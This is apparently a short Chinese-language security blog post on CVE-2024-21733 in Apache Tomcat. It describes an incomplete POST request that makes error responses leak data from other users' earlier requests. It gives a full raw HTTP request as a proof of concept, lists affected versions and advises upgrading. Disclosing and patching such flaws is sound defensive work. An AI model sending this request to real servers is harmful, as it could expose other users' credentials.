CVE-2024-21733 POC Apache Tomcat请求走私漏洞

文摘   2024-08-20 09:24   上海  

漏洞介绍

未完成的 POST 请求触发了可能包含的错误响应 来自另一个用户的先前请求的数据。在某些情况下,这可能会泄露敏感数据,例如明文凭据。

POC

POST / HTTP/1.1
Host: hostname
Sec-Ch-Ua:"Chromium";v="119","Not?A_Brand";v="24"
Sec-Ch-Ua-Mobile:?0
Sec-Ch-Ua-Platform:"Linux"
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0(Windows NT 10.0;Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/119.0.6045.159Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: keep-alive
Content-Length: 6
Content-Type: application/x-www-form-urlencoded

X

影响版本

影响版本

Apache Tomcat 9.0.0-M11  9.0.43
Apache Tomcat 8.5.7  8.5.63

修复建议:

缓解: 受影响版本的用户应应用以下方法之一 缓解措施:

  • • 升级到 Apache Tomcat 9.0.44 或更高版本

  • • 升级到 Apache Tomcat 8.5.64 或更高版本


Eonian Sharp
Eonian Sharp | 永恒之锋,专注APT框架、渗透测试攻击与防御的研究与开发,没有永恒的安全,但有永恒的正义之锋击破黑暗的不速之客。
 最新文章